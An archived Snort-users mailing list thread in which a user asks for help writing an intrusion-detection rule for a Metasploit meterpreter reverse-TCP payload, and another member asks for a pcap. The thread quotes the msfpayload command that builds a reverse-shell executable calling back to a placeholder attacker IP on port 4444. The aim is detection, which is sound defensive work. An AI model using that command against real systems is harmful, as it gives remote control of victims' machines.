Snort mailing list archives

Re: how to write rule for msfpayload in linux


From: nguyen cao via Snort-users <snort-users () lists snort org>
Date: Sun, 19 Nov 2017 08:31:26 +0700

On the attacker I use: msfpayload windows/meterpreter/reverse_tcp
LHOST=(IP_attacker) LPORT=4444 X > /root/Desktop/payload.exe (in order to create the file
payload.exe).
When I run the file payload.exe on the victim PC, I will take control of the
victim's system. I run Wireshark and match packets, but I do not know where to start
in order to write a rule for this type of attack.

msfpayload2
<https://drive.google.com/file/d/10MzIeyeThWHMfuhNyDJTuG3Y4QJ_qjcA/view?usp=drive_web>



2017-11-19 2:16 GMT+07:00 DFIRob <rd.seclists () gmail com>:

Hi, do you have a pcap that you want to alert on?

On Sat, Nov 18, 2017 at 3:22 PM, nguyen cao via Snort-users <
snort-users () lists snort org> wrote:

Who can help me write a rule for msfpayload in Linux?
Create payload by msfpayload: msfpayload windows/meterpreter/reverse_tcp
LHOST=/ /  LPORT=/ /....

_______________________________________________
Snort-users mailing list
Snort-users () lists snort org
Go to this URL to change user options or unsubscribe:
https://lists.snort.org/mailman/listinfo/snort-users

Please visit http://blog.snort.org to stay current on all the latest
Snort news!

Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette


